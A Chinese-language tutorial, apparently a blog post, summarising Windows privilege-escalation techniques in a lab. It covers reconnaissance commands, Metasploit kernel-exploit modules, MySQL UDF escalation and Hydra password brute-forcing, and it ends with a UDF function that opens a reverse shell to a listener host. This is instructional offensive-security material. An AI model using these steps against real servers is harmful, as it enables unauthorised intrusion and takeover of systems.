提权 --Windows提权方式总结
文章目录
- 一、提权含义
- 二、环境搭建
- 2.1 环境一览
- 2.2 靶机环境搭建
- 三、信息收集
- 3.1前提条件
- 3.2 基本信息收集
- 3.2.1 判断操作系统
- 3.2.2 判别当前权限
- 3.2.3 其它信息获取
- 3.3 高级信息收集
- 3.3.1 获取安装软件信息
- 3.3.2 wmic后渗透命令
- 四、主动攻击
- 4.1 溢出漏洞提权
- 4.1.1 Metasploit
- A. 查看当前权限
- B. 查看系统补丁
- C. 本地溢出提权
- 4.2 密码破解提权
- 4.3 Mysql数据库提权
- 4.3.1 UDF提权
- 导出UDF问题
- a. 数据库版本对UDF函数限制
- 4.3.2 MOF提权
- 4.3.3 反弹端口提权
- A. 原理问题
- B. 前提条件
- C. 攻击过程
- D. 提权方法
- 五、被动攻击
以下所有的操作都是在靶机环境中进行学习展示,对他人操作系统进行破坏会依法进行制裁!!!
一、提权含义
提高自己在服务器中权限(主要针对在网站入侵过程中,通过各种漏洞获得最高权限的操作过程)
二、环境搭建
2.1 环境一览
- Windows 10 1809(宿主机)
- VMware Workstation 15 Pro(虚拟机)
- Windows2008R2(靶机环境)
2.2 靶机环境搭建
Tips:如有其它的靶机环境,这部分可以略过
网上本来想找一些环境供大家进行练习,没有找到合适的虚拟机,这里就自己搭建一个吧!
》》将windows2008R2镜像copy到机子上并进行在虚拟机中准备安装
》》开启虚拟机,等待安装完成
》》等待VMware Tools安装
》》等待重新启动(键入安装时的密码)
Tips:以下的所有命令都是在模仿管理员的操作!
》》创建一个普通用户Kevin(密码:kevin123)
》打开安全策略(secpol.msc),修改如下策略:
》》添加成功,并查看当前用户
》》用户权限展示(标准用户)
》》切换到Kevin用户
三、信息收集
3.1前提条件
- 获得对方的shell
场景构建:此场景信息收集在于拿到了一个服务器shell,在低权限账户下的信息收集操作(这里为了方便演示我们可以使用nc反弹一个shell)
》》kali监听:
》》受害者执行
》》kali获得shell
3.2 基本信息收集
主要是一些windows上的cmd命令使用
3.2.1 判断操作系统
方法一:(利用不同操作系统命令判断,输入linux命令不能执行则目标系统为windows)
Tips:我们可以根据windows和linux特性:一直ping则判断是linux,发送4个数据包则是windows(这里借用下同事曾经的经验)
3.2.2 判别当前权限
》》通过at命令查看当前权限
(Tips:系统权限下才能执行at/schtask)
3.2.3 其它信息获取
》》获取主机名和用户用户
》》获取ip信息
》》获取系统变量
》》获取一些基本信息
- 主机版本型号
- 安装日期
- 是否为虚拟机(根据:系统制造商)
- 服务器时区
- 域
- 网卡信息
》》获取本地端口信息
(Tips:可以查看到哪些内网主机可以与本机进行数据交互,还可以查看一些内网主机存活列表)
3.3 高级信息收集
3.3.1 获取安装软件信息
》》在注册表中获取详细的安装软件信息
reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.txt
(列出了软件名称和版本信息)
》》匹配注册表中的软件
find "DisplayName" reg.txt |find /V "ParentDisplayName" > tmplist.txt
(简单查看软件名和版本)
3.3.2 wmic后渗透命令
关于wmic后渗透命令会在后边进行详细阐述!
四、主动攻击
4.1 溢出漏洞提权
4.1.1 Metasploit
情景提示:现在我们有一个普通用户的shell,并成功在目标机子上运行了msf生成的载荷文件,操作方法可参考:Windows系统后门之exe文件
A. 查看当前权限
(通过shell查看到非系统权限)
B. 查看系统补丁
- 方法一(POST模块-漏洞侦查尝试)
》》使用post/multi/recon/local_exploit_suggester模块进行侦查能够呗识别的漏洞
- 方法二(POST模块-未打补丁查看)
C. 本地溢出提权
》》将Meterpreter当前会话切换至后台
(通过B查看的系统补丁,这里随便用一个未打的系统补丁进行测试)
》》搜索ms11-080
(AfdJoinLeaf特权升级)
》》使用此漏洞进行提权
》》查看配置参数,设置session即可
》》告诉我们不支持64位系统运行攻击,这里具体还需要参考gthub上系统移除漏洞提权汇总:https://github.com/SecWiki/windows-kernel-exploits
》》这里我们直接使用ms18-8120
》》成功获取最高权限
4.2 密码破解提权
4.3 Mysql数据库提权
4.3.1 UDF提权
导出UDF问题
a. 数据库版本对UDF函数限制
- 数据库版本在4.1之前,可以将DLL中的函数都注册到MSYQL里供mysql调用(无论位置)
- 数据库版本在4.1之后,UDF函数进行限制,只有特定接口的函数才可以被成功注册到mysql中(防止mysql非法调用系统dll)
- 数据库版本在5.0之后,对注册DLL的位置有限制,不能为绝对路径(可以通过将DLL放到system32目录下绕过此限制,将dll放到PATH环境变量的任何一个目录下也可以)
- 数据库版本在5.1之后,创建函数时所用的dll只能放到mysql的plugin目录中(默认该目录不存在)
4.3.2 MOF提权
4.3.3 反弹端口提权
A. 原理问题
原理:
本质上也是一种udf提权,利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限
问题:
- 测试的版本如下不能创建函数,如能创建函数则可利用这种方式提权
(这里我安装了两个5.1以下的版本测试都失败了)
B. 前提条件
- 数据库允许远程连接(外网访问连接)
- 获取到数据库的密码
- 当前数据库版本可以创建函数,mysql版本
C. 攻击过程
攻击过程指:探测到数据库可远程连接且对数据库密码进行获取的过程
》》Nmap探测目的端口是否开放了mysql服务(已开放)
》》测试是否开启远程链接远程连接
方法一: 远程检查是否允许远程连接(返回如下不允许连接):
方法二: 使用客户端管理软件连接试探(返回如下则不允许远程连接):
方法二: Hydra 远程爆破,显示如下则不允许远程连接
》》这里为了演示提权方法,先允许数据库远程连接,操作请参考:Mysql开启远程连接
D. 提权方法
》》使用hydra爆破到msyql的密码(略)
》》远程连接到对方的mysql
》》创建函数backshell
CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll';
》》在独立主机上执行监听
》》执行backshell
select backshell("监听主机IP",2020);